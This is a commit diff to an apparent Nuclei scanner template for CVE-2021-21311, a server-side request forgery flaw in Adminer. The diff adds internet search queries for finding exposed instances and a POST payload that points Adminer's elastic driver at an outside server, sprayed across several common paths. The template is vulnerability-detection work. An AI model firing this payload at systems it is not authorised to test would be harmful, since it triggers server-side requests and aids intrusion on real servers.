fix cve-2021-21311

cves/2021/CVE-2021-21311.yaml

@@ -2,7 +2,7 @@ id: CVE-2021-21311
 
 info:
   name: Adminer <4.7.9 - Server-Side Request Forgery
-  author: Adam Crosser
+  author: Adam Crosser,pwnhxl
   severity: high
   description: Adminer from version 4.0.0 through 4.7.8 is susceptible to server-side request forgery due to its use of verbose error messages. Users of Adminer versions bundling all drivers (e.g. `adminer.php`) are affected.
   reference:
@@ -18,16 +18,38 @@ info:
     cwe-id: CWE-918
   metadata:
     shodan-query: title:"Login - Adminer"
+    hunter-query: app.name="Adminer"&&web.body="4.7.8"
+    fofa-query: app="Adminer" && body="4.7.8"
   tags: cve,cve2021,adminer,ssrf
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/adminer?elastic=interact.sh&username="
+variables:
+  randstring: "{{to_lower(rand_base(8))}}"
 
+requests:
+  - raw:
+    - |
+        POST {{path}} HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        auth[driver]=elastic&auth[server]=example.org&auth[username]={{randstring}}&auth[password]={{randstring}}&auth[db]={{randstring}}
+    redirects: true
+    max-redirects: 1
+    cookie-reuse: true
+
+    attack: batteringram
+    payloads:
+      path:
+        - "/index.php"
+        - "/adminer.php"
+        - "/adminer/adminer.php"
+        - "/adminer/index.php"
+        - "/_adminer.php"
+        - "/_adminer/index.php"
+
+    stop-at-first-match: true
     matchers-condition: and
     matchers:
-
       - type: word
         part: body
         words:
@@ -36,5 +58,3 @@ requests:
       - type: status
         status:
           - 403
-
-# Enhanced by mp on 2022/06/27